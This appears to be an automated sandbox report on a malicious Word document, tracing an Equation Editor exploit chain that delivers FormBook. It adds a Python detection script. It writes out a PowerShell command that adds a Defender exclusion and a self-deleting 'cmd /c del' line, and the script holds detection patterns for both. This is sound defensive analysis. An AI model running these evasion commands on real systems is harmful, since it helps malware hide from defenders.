      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022AE2E9
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022B2305
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022FA37B
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_023563BF
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022D63DB
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022AE0C6
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_02352622
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022FA634
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022B4680
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022BE6C1
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022BC7BC
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0233443E
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022F6540
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_023305E3
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022CC5F0
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0235CBA4
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_02336BCB
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022D286D
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022BC85C
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022FC920
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022B29B2
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0235098E
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_023449F5
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022C69FE
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022E2E2F
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022CEE4C
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022C0F3F
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0234CFB1
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_02322FDC
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0233AC5E
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_02352C9C
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022E0D3B
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022BCD5B
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_02351238
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022B7353
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022AF3CF
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022DD005
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0232D06D
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022B3040
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022C905A
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0233D13F
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0234771D
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0233579A
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022E57C3
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022ED47D
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022C1489
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022E5485
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022B351F
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_023535DA
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_02363A83
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022D7B00
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0233DBDA
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022AFBD7
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0234F8EE
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0232F8C4
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_02335955
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0233394B
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0233BF14
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022DDF7C
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0234FDDD
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0009D64C
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_00082D90
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_00089E5D
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_00089E60
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_00082FB0
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0204A036
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0204B232
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_02045B30
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_02045B32
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_02041082
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_02048912
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_02042D02
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0204E5CD
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: String function: 022ADF5C appears 137 times
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: String function: 00911040 appears 587 times
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: String function: 022AE2A8 appears 60 times
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: String function: 00964E47 appears 128 times
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: String function: 022F373B appears 253 times
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: String function: 0231F970 appears 84 times
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: String function: 022F3F92 appears 132 times
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: String function: 00DDF970 appears 84 times
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: String function: 00D6E2A8 appears 60 times
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: String function: 00DB3F92 appears 132 times
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: String function: 00DB373B appears 253 times
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: String function: 00D6DF5C appears 137 times
Yara rules matched (rule metadata as reported, listed once):
INDICATOR_RTF_MalVer_Objects: author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Windows_Trojan_Diceloader_15eeb7b9: reference_sample = a1202df600d11ad2c61050e7ba33701c22c2771b676f54edd1846ef418bea746, os = windows, severity = x86, creation_date = 2021-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Diceloader, fingerprint = 4cc70bec5d241c6f84010fbfe2eafbc6ec6d753df2bb3f52d9498b54b11fc8cb, id = 15eeb7b9-311f-477b-8ae1-b8f689a154b7, last_modified = 2021-08-23
Windows_Trojan_Formbook_1112e116: reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Formbook_1: date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Formbook: author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: na.doc, type: SAMPLE | Matched rule: INDICATOR_RTF_MalVer_Objects
Source: 7.2.ihbgfbin.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Diceloader_15eeb7b9
Source: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Diceloader_15eeb7b9
Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Diceloader_15eeb7b9, Windows_Trojan_Formbook_1112e116, Formbook_1, Formbook
Source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Diceloader_15eeb7b9, Windows_Trojan_Formbook_1112e116, Formbook_1, Formbook
Source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Diceloader_15eeb7b9, Windows_Trojan_Formbook_1112e116, Formbook_1, Formbook
Source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Diceloader_15eeb7b9, Windows_Trojan_Formbook_1112e116, Formbook_1, Formbook
Source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rules: Windows_Trojan_Diceloader_15eeb7b9, Windows_Trojan_Formbook_1112e116, Formbook_1, Formbook
Source: Process Memory Space: ihbgfbin.exe PID: 3736, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116
Source: Process Memory Space: ihbgfbin.exe PID: 3824, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116
Source: Process Memory Space: mstsc.exe PID: 3948, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116
Note: every unpacked region that matches the Elastic Diceloader rule also matches three independent FormBook rules (Elastic, Malpedia/yara-signator, JPCERT/CC), and the extracted configuration is FormBook. Treat the Diceloader hit as signature overlap on this payload rather than evidence of a second family unless separate indicators appear.
Source: 4q0pGnqqpgTTSL7[1].exe.2.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ihbgfbin.exe.2.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, Mt83m7kf8vpro8b62h.cs | Security API names: _0020.SetAccessControl
Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, Mt83m7kf8vpro8b62h.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, Mt83m7kf8vpro8b62h.cs | Security API names: _0020.AddAccessRule
Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, Mt83m7kf8vpro8b62h.cs | Security API names: _0020.SetAccessControl
Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, Mt83m7kf8vpro8b62h.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, Mt83m7kf8vpro8b62h.cs | Security API names: _0020.AddAccessRule
Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, Mt83m7kf8vpro8b62h.cs | Security API names: _0020.SetAccessControl
Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, Mt83m7kf8vpro8b62h.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, Mt83m7kf8vpro8b62h.cs | Security API names: _0020.AddAccessRule
Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, JqoaEHn6fskh1axBN5.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, JqoaEHn6fskh1axBN5.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, JqoaEHn6fskh1axBN5.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.expl.evad.winDOC@13/14@10/3
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0095BC3B memset,memset,??2@YAPAXI@Z,CreateThread,GetLastError,CloseHandle,LoadStringW,LoadStringW,FormatMessageW,LoadStringW,MessageBoxW,LocalFree
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0094B92E CoCreateInstance
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_00912890 LoadLibraryExW,FindResourceExW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$na.doc
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD2F7.tmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: 22 writes of a UTF-16 console buffer (rendered as runs of dots in the report). The readable fragments, in order, are "again", "At line:1 char:1", "+ ~~~~~~~~~~~~~~~~" and "...mmandNotFoundException", i.e. the standard PowerShell error block for a CommandNotFoundException. The only command this process ran is Add-MpPreference -ExclusionPath (see the process list below), so the output is consistent with that cmdlet being unavailable on the analysis VM and the Defender exclusion not taking effect. Whether the exclusion is actually applied depends on the target OS having the Defender PowerShell module; verify that before treating it as established defense evasion.
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers (Software Restriction Policy lookup performed when the child process is created)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences; name resolution from the equation editor)
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts (8 occurrences; name resolution from the injected explorer.exe)
Source: na.doc | ReversingLabs: Detection: 39%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\ihbgfbin.exe "C:\Users\user\AppData\Roaming\ihbgfbin.exe"
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe"
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Process created: C:\Users\user\AppData\Roaming\ihbgfbin.exe "C:\Users\user\AppData\Roaming\ihbgfbin.exe"
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"
Source: C:\Windows\SysWOW64\mstsc.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Roaming\ihbgfbin.exe"
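Detection logic for this process chain, written against the "Process created" lines above and the "Section loaded" lines that follow. This is an added example and is not part of the Joe Sandbox report. The events are constructed from the report's own paths and command lines in a Sysmon-like shape; the event field names, the rule names and the benign control events are assumptions of this example.

```python
"""Rules over the process tree and module loads recorded in this report.

Added example, not part of the Joe Sandbox report. Events are constructed
from the report's paths and command lines in a Sysmon-like shape; the field
names (type, image, parent_image, command_line, loaded_image) are assumed.
"""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
EQNEDT = "eqnedt32.exe"
# DLLs that bring up the HTTP/DNS stack; the Equation Editor never needs them.
NETWORK_DLLS = {"winhttp.dll", "webio.dll", "dnsapi.dll", "wininet.dll"}
USER_PROFILE_DIR = re.compile(r"\\users\\[^\\]+\\appdata\\", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect_process(ev):
    """Return the names of the rules a process-creation event trips."""
    hits = []
    image, parent = basename(ev["image"]), basename(ev["parent_image"])
    cmd = ev.get("command_line", "")
    # Office spawning the legacy Equation Editor (CVE-2017-11882 / CVE-2018-0802 delivery).
    if parent in OFFICE_APPS and image == EQNEDT:
        hits.append("office_spawns_equation_editor")
    # Equation Editor starting a binary dropped under the user profile.
    if parent == EQNEDT and USER_PROFILE_DIR.search(ev["image"]):
        hits.append("equation_editor_spawns_user_dir_binary")
    # Defender exclusion added from PowerShell. A base64 -EncodedCommand
    # variant must be decoded before this plain-text check can see it.
    if image == "powershell.exe" and re.search(r"add-mppreference\s+-exclusionpath", cmd, re.I):
        hits.append("defender_exclusion_added")
    # explorer.exe (injected) launching a SysWOW64 binary with no arguments:
    # low fidelity on its own, useful when correlated with the rules above.
    if parent == "explorer.exe" and image == "mstsc.exe" and cmd.strip().lower().endswith('mstsc.exe"'):
        hits.append("explorer_spawns_mstsc_no_args")
    # Self-deletion of the dropped loader via cmd /c del.
    if image == "cmd.exe" and re.search(r'/c\s+del\s+"?[^"]*\\appdata\\', cmd, re.I):
        hits.append("cmd_deletes_appdata_binary")
    return hits


def detect_image_load(ev):
    """Return the rule names an image-load event trips."""
    if basename(ev["image"]) == EQNEDT and basename(ev["loaded_image"]) in NETWORK_DLLS:
        return ["equation_editor_loads_network_dll"]
    return []


def run(events):
    """Evaluate every event and return (rule, image) pairs in event order."""
    findings = []
    for ev in events:
        names = detect_process(ev) if ev["type"] == "process_create" else detect_image_load(ev)
        findings.extend((name, ev["image"]) for name in names)
    return findings


# Constructed sample events mirroring the report's process tree and section loads.
WINWORD = r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE"
EQN = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
DROP = r"C:\Users\user\AppData\Roaming\ihbgfbin.exe"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
MSTSC = r"C:\Windows\SysWOW64\mstsc.exe"


def pc(parent, image, cmd):
    return {"type": "process_create", "parent_image": parent, "image": image, "command_line": cmd}


def il(image, dll):
    return {"type": "image_load", "image": image, "loaded_image": dll}


SAMPLE_EVENTS = [
    pc(WINWORD, EQN, f'"{EQN}" -Embedding'),
    pc(EQN, DROP, f'"{DROP}"'),
    pc(DROP, PS, f'"{PS}" Add-MpPreference -ExclusionPath "{DROP}"'),
    pc(DROP, DROP, f'"{DROP}"'),
    pc(r"C:\Windows\explorer.exe", MSTSC, f'"{MSTSC}"'),
    pc(MSTSC, r"C:\Windows\SysWOW64\cmd.exe", f'/c del "{DROP}"'),
    il(EQN, r"C:\Windows\SysWOW64\winhttp.dll"),
    il(EQN, r"C:\Windows\SysWOW64\dnsapi.dll"),
    # Benign controls (assumed): an operator opening Remote Desktop with a host
    # argument, and Word itself loading WinHTTP.
    pc(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mstsc.exe", r'"C:\Windows\System32\mstsc.exe" /v:fileserver'),
    il(WINWORD, r"C:\Windows\SysWOW64\winhttp.dll"),
]

if __name__ == "__main__":
    for rule, image in run(SAMPLE_EVENTS):
        print(f"{rule:40s} {image}")
```

Run as-is it reports seven findings for the eight malicious events (the loader re-spawning itself trips nothing on its own) and none for the two benign controls. The explorer.exe to mstsc.exe rule is deliberately narrow; in production, key it on the whole set of SysWOW64 binaries FormBook picks from and require a second hit from this list before alerting.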
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Sections loaded (in order): wow64win.dll, wow64cpu.dll, msi.dll, cryptsp.dll, rpcrtremote.dll, dwmapi.dll, version.dll, secur32.dll, winhttp.dll, webio.dll, iphlpapi.dll, winnsi.dll, dnsapi.dll, nlaapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, rasadhlp.dll. The equation editor has no legitimate reason to bring up the HTTP and DNS stack (winhttp.dll, webio.dll, dnsapi.dll); this is the exploit shellcode fetching the next stage, matching the "Office equation editor establishes network connection" signature.
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Sections loaded (in order): wow64win.dll, wow64cpu.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, bcrypt.dll, cryptsp.dll, amsi.dll, windowscodecs.dll, propsys.dll, apphelp.dll, ntmarta.dll, secur32.dll, rpcrtremote.dll. The CLR runtime libraries and amsi.dll confirm a .NET loader; ntmarta.dll is the ACL provider behind the SetAccessControl / AddAccessRule calls listed above.
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Sections loaded (in order): wow64win.dll, wow64cpu.dll, atl.dll, mscoree.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, msisip.dll, amsi.dll, secur32.dll, rpcrtremote.dll, amsi.dll, ncrypt.dll, bcrypt.dll, gpapi.dll
Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe (second instance) | Sections loaded (in order): wow64win.dll, wow64cpu.dll
Source: C:\Windows\explorer.exe | Sections loaded (in order): dnsapi.dll, rasadhlp.dll (name resolution from the injected explorer.exe, consistent with its hosts-file reads above)
Source: C:\Windows\SysWOW64\mstsc.exe | Sections loaded (in order): wow64win.dll, wow64cpu.dll, winhttp.dll, webio.dll, credui.dll, secur32.dll, cryptui.dll, netapi32.dll, netutils.dll, srvcli.dll, wkscli.dll, winmm.dll, iphlpapi.dll, winnsi.dll, version.dll. winhttp.dll and webio.dll give the hijacked process the HTTP stack used for C2 traffic.
Source: C:\Windows\SysWOW64\cmd.exe | Sections loaded (in order): wow64win.dll, wow64cpu.dll, winbrand.dll
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
      Source: na.LNK.0.drLNK file: ..\..\..\..\..\Desktop\na.doc
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
      Source: na.docStatic file information: File size 1189943 > 1048576
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: wntdll.pdb source: ihbgfbin.exe, ihbgfbin.exe, 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 0000000A.00000003.429889200.0000000002100000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 0000000A.00000002.928676089.0000000002410000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 0000000A.00000003.429589348.0000000001FA0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mstsc.pdb source: ihbgfbin.exe, 00000007.00000002.429868517.0000000002770000.00000040.10000000.00040000.00000000.sdmp, mstsc.exe, mstsc.exe, 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp

      Data Obfuscation

      Source: 5.2.ihbgfbin.exe.3ef9c00.3.raw.unpack, Mt83m7kf8vpro8b62h.cs | .Net Code: xtgDCsAqI4 System.Reflection.Assembly.Load(byte[])
      Source: 5.2.ihbgfbin.exe.3f69820.2.raw.unpack, Mt83m7kf8vpro8b62h.cs | .Net Code: xtgDCsAqI4 System.Reflection.Assembly.Load(byte[])
      Source: 5.2.ihbgfbin.exe.6f0000.0.raw.unpack, Uo.cs | .Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
      Source: 5.2.ihbgfbin.exe.3510770.4.raw.unpack, Uo.cs | .Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
      Source: 5.2.ihbgfbin.exe.8260000.5.raw.unpack, Mt83m7kf8vpro8b62h.cs | .Net Code: xtgDCsAqI4 System.Reflection.Assembly.Load(byte[])
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_00943AE1 LoadLibraryW,GetProcAddress,FreeLibrary, 10_2_00943AE1
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_008F478D push esi; ret 2_2_008F478F
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_008EC3E2 push A0008EC4h; ret 2_2_008EC3F5
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_008E01F4 push eax; retf 2_2_008E01F5
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_008F4726 push ebx; ret 2_2_008F4727
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_008EA43A push eax; iretd 2_2_008EA505
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_008E8F59 push eax; retf 2_2_008E8F61
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 5_2_001B6C22 push esp; retn 0016h 5_2_001B6C2D
      Source: C:\Users\user\AppData\Roaming\ihbgfbin.exe | Code function: 7_2_00D6DFA1 push ecx; ret 7_2_00D6DFB4
      Source: C:\Windows\explorer.exe | Code function: 9_2_082049B5 push esp; retn 0000h 9_2_08204AE7
      Source: C:\Windows\explorer.exe | Code function: 9_2_08204B02 push esp; retn 0000h 9_2_08204B03
      Source: C:\Windows\explorer.exe | Code function: 9_2_08204B1E push esp; retn 0000h 9_2_08204B1F
      Source: C:\Windows\explorer.exe | Code function: 9_2_08CE09B5 push esp; retn 0000h 9_2_08CE0AE7
      Source: C:\Windows\explorer.exe | Code function: 9_2_08CE0B02 push esp; retn 0000h 9_2_08CE0B03
      Source: C:\Windows\explorer.exe | Code function: 9_2_08CE0B1E push esp; retn 0000h 9_2_08CE0B1F
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_00968B01 push ecx; ret 10_2_00968B14
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_022ADFA1 push ecx; ret 10_2_022ADFB4
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0009718C push ss; ret 10_2_00097194
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0009D485 push eax; ret 10_2_0009D4D8
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0009D4DB push eax; ret 10_2_0009D542
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0009D4D2 push eax; ret 10_2_0009D4D8
      Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 10_2_0009D53C push eax; ret 10_2_0009D542
